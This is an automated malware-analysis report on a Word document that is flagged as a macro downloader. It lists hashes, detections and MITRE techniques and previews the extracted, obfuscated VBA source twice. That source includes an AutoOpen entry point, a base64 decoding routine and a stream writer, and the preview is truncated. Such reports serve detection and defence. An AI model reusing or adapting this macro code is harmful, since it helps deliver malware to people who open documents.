Office (OLE) malware analysis — malicious · 53473ac925204fad

MALICIOUS

Office (OLE)

163.5 KB Created: 2017-05-02 21:49:00 Authoring application: Microsoft Office Word First seen: 2017-05-13

MD5: 83f586b14963657c2a65771a10e04772 SHA-1: 4f16c06736df317275e1519779548200341c010c SHA-256: 53473ac925204fad22ff7a7d97c5d462bb3f6c83f48919ececfa4191a3f18caf

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The script utilizes CreateObject to instantiate objects, likely for downloading and executing a second-stage payload. The presence of Shell() and CreateObject calls, along with the ClamAV detection, strongly indicates a downloader functionality.

Heuristics 8

ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17274 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17274 bytes
SHA-256: `5656c89f56e0cd6755e775e728c26d2a56905a1ad6602870a488d256758d6e82`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoOpen() Dim dVWk5 As Boolean dVWk5 = False Dim JSrsv As Byte JSrsv = 73 tMKnYf End Sub Attribute VB_Name = "Module2" Public Function x4APV(ByVal Uwtaql1) Dim shjq34R As Long shjq34R = 0 Dim HwPDXehR As Double HwPDXehR = Sgn(6849.5910574052) Dim MvkaC0Tbw As Byte MvkaC0Tbw = 36 Dim FZtWpM Dim zcH8Zbk Dim PSyfAlH As Integer PSyfAlH = Sgn(-30739) Dim jDlZax1j5 jDlZax1j5 = StrConv(VXnGKf0k, vbLowerCase) Dim MFYdZMx As Long MFYdZMx = 0 Dim Yv3xQE As String Yv3xQE = Len(Vhk681) Dim M10CzTp As String M10CzTp = AscW("B") Dim xmj9k As Integer xmj9k = Sgn(7638) Dim ekSmba As Integer ekSmba = 15304 Dim Z3ZyTvM As Byte Z3ZyTvM = 234 Dim QVXLICU QVXLICU = RTrim(QVAdl) Dim iuPny As Boolean iuPny = True Set FZtWpM = CreateObject("msxml2.domdocument") Dim igCEz1 As Integer igCEz1 = Sgn(13366) Dim yW9lycVI As Integer yW9lycVI = Sgn(-12574) Set zcH8Zbk = FZtWpM.CreateElement(sgb39) Dim JM13A8rsm As Byte JM13A8rsm = 243 Dim WsdMUfA As Double WsdMUfA = 41160.904586662 Dim og0fzWd6 As Integer og0fzWd6 = Sgn(-5342) Dim JA03K As Boolean JA03K = True Dim Tc2SlT6G As Double Tc2SlT6G = Round(15725.337883158) Dim CduyHCXRA As Single CduyHCXRA = Val(13477.523641112) With zcH8Zbk Dim iPgh2fk As Boolean iPgh2fk = True Dim Wne5yd As Long Wne5yd = -1190783454 Dim U18ZfnwA As Boolean U18ZfnwA = False Dim W5cgx As Long W5cgx = Sgn(0) Dim mtfyO As Boolean mtfyO = True zcH8Zbk.DataType = "bin." & sgb39 Dim VXzRT5vlZ As Integer VXzRT5vlZ = Sgn(-135) Dim AbQ7wp As Long AbQ7wp = 0 zcH8Zbk.Text = Uwtaql1 End With Dim x4LUaw As Long x4LUaw = 0 Dim iNMVEh As Boolean iNMVEh = True Dim Xu9gT As Boolean Xu9gT = True Dim xh0VA2Rr As Byte xh0VA2Rr = 214 Dim UbO82 As Integer UbO82 = 15224 x4APV = R1iB8j96d(zcH8Zbk.nodeTypedValue) Dim MkJaL MkJaL = UCase(I2b9ESA) Dim eNGElC As Byte eNGElC = 49 Dim wnolKZ As Integer wnolKZ = Sgn(-20763) Dim RAHuDp5 As String RAHuDp5 = ESgrY3 Dim PtldT PtldT = Len(UYqOy) Set zcH8Zbk = Nothing Set FZtWpM = Nothing End Function Function R1iB8j96d(Binary) Dim hEFfb As Byte hEFfb = 80 Dim ojVQMPI1 As Byte ojVQMPI1 = 166 Dim okvKA As Double okvKA = Int(30322.678039902) Dim xulK8f As Boolean xulK8f = True Dim IjgfuEt As Byte IjgfuEt = 124 Const IPY6x = 2 Const U0Sy8Og = 1 Dim X7KHpLPm As Double X7KHpLPm = Round(51060.71705188) Dim Hbluo8 As Boolean Hbluo8 = False Dim cBStZ5 Dim ArWYeq As Single ArWYeq = Sgn(25629.27534658) Dim BfQKz As Byte BfQKz = 255 Dim ziLElr As Integer ziLElr = Sgn(18883) Dim zaAGH As Single zaAGH = Sgn(42667.789562611) Dim ZqMsjtQ3 As Boolean ZqMsjtQ3 = False Dim lNguMEo As Byte lNguMEo = 247 Set cBStZ5 = CreateObject("adodb.stream") Dim zZj3g As Boolean zZj3g = False Dim AdhSf3p As Boolean AdhSf3p = False Dim Dpy9DT Dpy9DT = Len(lbW6z3BI9) Dim zpoGS As Byte zpoGS = 63 With cBStZ5 Dim OJm0AI As Boolean OJm0AI = False Dim bsNx8kc As String bsNx8kc = Trim(yISDh2) Dim k9XGwzpJN As Integer k9XGwzpJN = Sgn(-7085) Dim isH9Ph As Boolean isH9Ph = True Dim wlCdDHrX As Boolean wlCdDHrX = True Dim nyeS0KACG As Byte nyeS0KACG = 51 .Type = U0Sy8Og Dim UxvZsTwY As Double UxvZsTwY = Fix(34822.261297741) Dim XIdRs As Byte XIdRs = 8 Dim JuG76 As Integer JuG76 = -16313 .Open Dim mPfTG As String mPfTG = LCase(SNQhVf) Dim p3wWc As Byte p3wWc = 19 Dim PrIJUY8 As String PrIJUY8 = StrConv(oTlZ16wV, vbLowerCase) Dim xBWMD As Byte xBWMD = 21 Dim TLARfltr4 As String TLARfltr4 = Val(aiVX7DJv) .Write Binary Dim xVNCx7 As Integer xVNCx7 = Sgn(2815) Dim MEVxNF2l As Byte MEVxNF2l = 156 Dim SQlG8 As Boolean SQlG8 = False Dim UR3zACWG4 As Byte UR3zACWG4 = 215 Dim WCR3z0M As Long WCR3z0M = 0 .Position = 0 Dim Aiaro9g As Byte Aiaro9g = 77 ... (truncated)

SHA-256: 5656c89f56e0cd6755e775e728c26d2a56905a1ad6602870a488d256758d6e82

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim dVWk5 As Boolean
dVWk5 = False
Dim JSrsv As Byte
JSrsv = 73
tMKnYf
End Sub

Attribute VB_Name = "Module2"
Public Function x4APV(ByVal Uwtaql1)

Dim shjq34R As Long
shjq34R = 0
Dim HwPDXehR As Double
HwPDXehR = Sgn(6849.5910574052)
Dim MvkaC0Tbw As Byte
MvkaC0Tbw = 36
Dim FZtWpM
Dim zcH8Zbk
Dim PSyfAlH As Integer
PSyfAlH = Sgn(-30739)
Dim jDlZax1j5
jDlZax1j5 = StrConv(VXnGKf0k, vbLowerCase)
Dim MFYdZMx As Long
MFYdZMx = 0
Dim Yv3xQE As String
Yv3xQE = Len(Vhk681)
Dim M10CzTp As String
M10CzTp = AscW("B")
Dim xmj9k As Integer
xmj9k = Sgn(7638)
Dim ekSmba As Integer
ekSmba = 15304
Dim Z3ZyTvM As Byte
Z3ZyTvM = 234
Dim QVXLICU
QVXLICU = RTrim(QVAdl)
Dim iuPny As Boolean
iuPny = True
Set FZtWpM = CreateObject("msxml2.domdocument")
Dim igCEz1 As Integer
igCEz1 = Sgn(13366)
Dim yW9lycVI As Integer
yW9lycVI = Sgn(-12574)
Set zcH8Zbk = FZtWpM.CreateElement(sgb39)

Dim JM13A8rsm As Byte
JM13A8rsm = 243
Dim WsdMUfA As Double
WsdMUfA = 41160.904586662
Dim og0fzWd6 As Integer
og0fzWd6 = Sgn(-5342)
Dim JA03K As Boolean
JA03K = True
Dim Tc2SlT6G As Double
Tc2SlT6G = Round(15725.337883158)
Dim CduyHCXRA As Single
CduyHCXRA = Val(13477.523641112)
With zcH8Zbk

Dim iPgh2fk As Boolean
iPgh2fk = True
Dim Wne5yd As Long
Wne5yd = -1190783454
Dim U18ZfnwA As Boolean
U18ZfnwA = False
Dim W5cgx As Long
W5cgx = Sgn(0)
Dim mtfyO As Boolean
mtfyO = True
zcH8Zbk.DataType = "bin." & sgb39
Dim VXzRT5vlZ As Integer
VXzRT5vlZ = Sgn(-135)
Dim AbQ7wp As Long
AbQ7wp = 0
zcH8Zbk.Text = Uwtaql1
End With

Dim x4LUaw As Long
x4LUaw = 0
Dim iNMVEh As Boolean
iNMVEh = True
Dim Xu9gT As Boolean
Xu9gT = True
Dim xh0VA2Rr As Byte
xh0VA2Rr = 214
Dim UbO82 As Integer
UbO82 = 15224
x4APV = R1iB8j96d(zcH8Zbk.nodeTypedValue)
Dim MkJaL
MkJaL = UCase(I2b9ESA)
Dim eNGElC As Byte
eNGElC = 49
Dim wnolKZ As Integer
wnolKZ = Sgn(-20763)
Dim RAHuDp5 As String
RAHuDp5 = ESgrY3
Dim PtldT
PtldT = Len(UYqOy)
Set zcH8Zbk = Nothing
Set FZtWpM = Nothing
End Function
Function R1iB8j96d(Binary)

Dim hEFfb As Byte
hEFfb = 80
Dim ojVQMPI1 As Byte
ojVQMPI1 = 166
Dim okvKA As Double
okvKA = Int(30322.678039902)
Dim xulK8f As Boolean
xulK8f = True
Dim IjgfuEt As Byte
IjgfuEt = 124
Const IPY6x = 2
Const U0Sy8Og = 1
Dim X7KHpLPm As Double
X7KHpLPm = Round(51060.71705188)
Dim Hbluo8 As Boolean
Hbluo8 = False
Dim cBStZ5
Dim ArWYeq As Single
ArWYeq = Sgn(25629.27534658)
Dim BfQKz As Byte
BfQKz = 255
Dim ziLElr As Integer
ziLElr = Sgn(18883)
Dim zaAGH As Single
zaAGH = Sgn(42667.789562611)

Dim ZqMsjtQ3 As Boolean
ZqMsjtQ3 = False
Dim lNguMEo As Byte
lNguMEo = 247
Set cBStZ5 = CreateObject("adodb.stream")

Dim zZj3g As Boolean
zZj3g = False
Dim AdhSf3p As Boolean
AdhSf3p = False
Dim Dpy9DT
Dpy9DT = Len(lbW6z3BI9)
Dim zpoGS As Byte
zpoGS = 63
With cBStZ5

Dim OJm0AI As Boolean
OJm0AI = False
Dim bsNx8kc As String
bsNx8kc = Trim(yISDh2)
Dim k9XGwzpJN As Integer
k9XGwzpJN = Sgn(-7085)
Dim isH9Ph As Boolean
isH9Ph = True
Dim wlCdDHrX As Boolean
wlCdDHrX = True
Dim nyeS0KACG As Byte
nyeS0KACG = 51
.Type = U0Sy8Og
Dim UxvZsTwY As Double
UxvZsTwY = Fix(34822.261297741)
Dim XIdRs As Byte
XIdRs = 8
Dim JuG76 As Integer
JuG76 = -16313
.Open
Dim mPfTG As String
mPfTG = LCase(SNQhVf)
Dim p3wWc As Byte
p3wWc = 19
Dim PrIJUY8 As String
PrIJUY8 = StrConv(oTlZ16wV, vbLowerCase)
Dim xBWMD As Byte
xBWMD = 21
Dim TLARfltr4 As String
TLARfltr4 = Val(aiVX7DJv)
.Write Binary
Dim xVNCx7 As Integer
xVNCx7 = Sgn(2815)
Dim MEVxNF2l As Byte
MEVxNF2l = 156
Dim SQlG8 As Boolean
SQlG8 = False
Dim UR3zACWG4 As Byte
UR3zACWG4 = 215
Dim WCR3z0M As Long
WCR3z0M = 0
.Position = 0

Dim Aiaro9g As Byte
Aiaro9g = 77

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.